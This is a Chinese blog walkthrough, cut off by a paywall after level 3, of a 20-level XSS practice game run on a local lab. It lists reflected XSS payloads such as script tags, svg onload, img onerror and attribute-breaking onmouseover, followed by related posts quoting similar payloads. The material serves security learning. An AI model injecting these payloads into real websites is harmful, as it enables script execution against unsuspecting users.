XSS小游戏

最新推荐文章于 2025-07-20 00:00:16 发布
原创 最新推荐文章于 2025-07-20 00:00:16 发布 · 5.8k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

这篇博客介绍了一个XSS游戏,包含20个级别,每个级别有不同的XSS payload。从简单的<script>标签注入到更复杂的字符编码和事件触发,逐步提升难度。玩家需要理解各种XSS攻击方式,如利用事件属性、标签属性、字符编码等来触发JavaScript执行。博客还提供了每级的payload示例,帮助读者深入理解XSS漏洞的利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS小游戏源码源码下载
XSS payload集合
xss其他标签下的js用法总结大全
AwesomeXSS

XSS GAMES

在这里插入图片描述

LEVEL1

在这里插入图片描述
level1.php
在这里插入图片描述
payload

http://127.0.0.1/xss/level1.php?name=<script>alert(1)</script>
http://127.0.0.1/xss/level1.php?name=<svg/οnlοad=alert(1)>
http://127.0.0.1/xss/level1.php?name=<img src=1 οnerrοr=alert(1)>
http://127.0.0.1/xss/level1.php?name=<a href="javascript:alert(1)">test</a>
http://127.0.0.1/xss/level1.php?name=<p οnclick='alert(1)'>test</p> #点击触发事件
http://127.0.0.1/xss/level1.php?name=<p οnmοuseοver='alert(1)'>test</p> #移动鼠标触发事件

在这里插入图片描述

LEVEL2

在这里插入图片描述
level2.php
在这里插入图片描述在输入框那里存在xss漏洞,因此只需闭合前面的双引号即可

payload:

http://127.0.0.1/xss/level2.php?keyword="><script>alert(1)</script>
http://127.0.0.1/xss/level2.php?keyword="οnmοuseοver='alert(1)' #移动鼠标到输入框处

在这里插入图片描述

LEVEL3

在这里插入图片描述
level3.php
在这里插入图片描述
htmlspecialchars函数默认是不过滤单引号的,只有设置了:quotestyle选项为ENT_QUOTES才会过滤单引号。
payload:

http://127.0.0.1/xss/level3.php?keyword='οnmοuseοver='alert(1)'

在这里插入图片描述

LEVEL4

在这里插入图片描述
level4.php
在这里插入图片描述
payload:

http://127.0.0.1/xss/level4.

最低0.47元/天 解锁文章

200万优质内容无限畅学
XSS小游戏(题目+解析)DOM破坏!!!
Nirvana92的博客
08-16 2530
我将题目要求进行翻译: 题目的主要要求就是:弹出一个(1337)的弹窗 开始解题: Let’s Go! 首先,传个参数看看 发现参数直接显示在了 < h2 > 标签里面了,肯定是有问题的。 回看一下代码: 用的是innerHTML,这个就是解题的关键,它里面有一个威胁标签,官方将其禁用了,就是 < script > 但是也只是禁用了这一个标签,所以换一个就行了用 < img > 试试:成功! 绕过代码: 二、Jefff 看代码知道: 这个值赋值给了ma,然后在1秒的睡眠后,在页面输出 那么就正常的
XSS小游戏【1-13关】
XiaoYeZhu_1314的博客
10-30 676
第一关 Payload:<script>alert(1)</script> 第二关 Payload:keyword=<script>alert(1)</script> 发现没有成功,F12发现需要闭合input 标签 再次输入payload:aaa"><svg onload=alert(1)> //当这个输入被插入到网页中时,浏览器会将其解析为HTML代码,并执行其中的JavaScript代码 第三
xss闯关小游戏.zip
02-25
这是一款利用xss漏洞闯关的小游戏,无需连接数据库,共20关,非常适合网络安全攻防的初学者练习使用,使用及安装教程请看此链接,https://editor.csdn.net/md?articleId=104496122 欢迎各位小伙伴下载
XSS闯关小游戏
weixin_42728957的博客
12-07 3748
最近在学习xss,找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 我这里使用本地搭建,方便分析代码,安装好的页面如下: level1 登录页面: 查看代码 <?php ini_set("display_errors", 0); $str = $_GET["name"]; ech
xss的利用
最新发布
m0_73832254的博客
07-20 777
跨站脚本攻击,为了不和层叠样式表的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之 时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层 面的攻击!二、反射型XSS是非持久性、参数型的跨站脚本。反射型XSS的JS代码在Web应用的参数(变量)中,如搜 索框的反射型XSS。在搜索框中,提交,点击搜索,即可触发反射型XSS。注意到,我们提交的poc。
xss源码小游戏.rar
07-09
xss代码小游戏,你值得拥有,简单粗暴,带你学会xss,非常适合初学者.
xss小游戏
weixin_44110913的博客
03-01 782
<p></p><p>最近发现一个有趣的XSS闯关小游戏,游戏的作者是先知社区的大佬@Mramydnei,喜欢XSS的大家可以一起来学习交流。</p> 现在我把自己在前面的十八关里面的闯关过程记录一下,大神绕行,我是菜鸟,大家可以一起学习,互相进步成长。 第一关,没有任何疑问,简单的不能再简单,没有任何过滤 输入点...
Google的XSS游戏
积累,在于坚持
01-09 630
Level 1: Hello, world of XSS 好吧,这一关很简单,没什么可说的: alert(1); Level 2: Persistence is key 这一关可以用以下这几种不同的方式:  href="test" onclick="javascript:alert(1);">test 创建一个链接(需要与用户交互)  src="test.png" o
dvwa xss小游戏
07-09
dvwa是一个非常流行的Web安全教程平台,其中包含了一个名为XSS(Cross-Site Scripting,跨站脚本攻击)的小游戏部分。这个小游戏的设计目的...玩dvwa XSS小游戏可以帮助新手程序员了解防御此类常见Web漏洞的基本策略。
xss闯关游戏
weixin_44512852的博客
03-03 2007
** xss tv 题目1-6 ** 1:http://test.xss.tv/level1.php?name=test &amp;amp;amp;amp;amp;amp;lt;svg/alert(1)&amp;amp;amp;amp;amp;amp;gt; 2:http://test.xss.tv/level2.php?keyword=test 闭合掉双引号 on事件:” onclick=alert(1)&amp;amp;amp;amp;amp;amp;gt; “ onmouse
XSS闯关小游戏(level1~13)
qq_43381463的博客
02-04 556
XSS闯关小游戏(level1~13)
xss闯关挑战
11-09
这个是XSS闯关文件,解压后放在服务器的对应文件夹即可。 闯关笔记我博客中有记录,新手可以参考。 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。
xssgame.zip
06-10
xss小游戏靶场
XSS闯关小游戏(前13关)
shihui的博客
09-23 1055
1.存在可控参数2.页面存在回显3.使用带有特殊字符的语句去测试,网站是否进行了实例化 ( 例如 '">123 )4.构造闭合,实现payload的逃逸。
XSSxss-labs小游戏闯关
Z_David_Z的博客
01-25 1416
XSS闯关小游戏前言0X01 实验介绍0X02 实验目的下载链接第一关第二关第三关第四关第五关第六关第七关第八关第九关第十关第十一关第十二关第十三题第十四关第十五关第十六关第十七关第十八关第十九关第二十关总结 前言 0X01 实验介绍 为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSSXSS原理: 恶意web用户将代码植入到提供给其它用户使用的页面中,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页
有意思的游戏:Google XSS Game
横云断岭的专栏
05-31 5542
Google最近出了一个XSS的游戏: https://xss-game.appspot.com/ 我这个菜鸟看提示,花了两三个小时才全过了。。 这个游戏的规则是只要在攻击网页上弹出alert窗口就可以了。 题目页面是在iframe里嵌套的展现的,那么父窗口是如何知道iframe里成功弹出了窗口? 是这样子实现的: 题目页面加载了这个js,改写了alert函数,当alert被调
XSS挑战小游戏
qq_25899635的博客
10-10 709
** XSS小游戏 找到了一个xss练习平台,在线地址:http://test.xss.tv/ 实验环境也可以本地搭建,不过需要php+mysql的环境: xss通关小游戏:https://pan.baidu.com/s/1zS2GwTNbMBXEF2yNEBeLgA 密码:85g8 ** lvevel1: 通过查看右边源码发现$str从url接收一个get型name参数,且并没有进行任何过滤...
XSS靶场闯关小游戏
likfishdn的博客
04-05 933
这里试了下之前的方法" type="text" onclick="alert('xss')不可以直接执行,此时我们看一些cookie。此时在页面上添加一个按钮click" type="button" onclick="alert(/xss/)这里将ref的内容替换成" type="text" onclick="alert('xss')改为user=" onclick="alert('xss')" type="text"使用"onmouseover="alert(/xss/)"
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值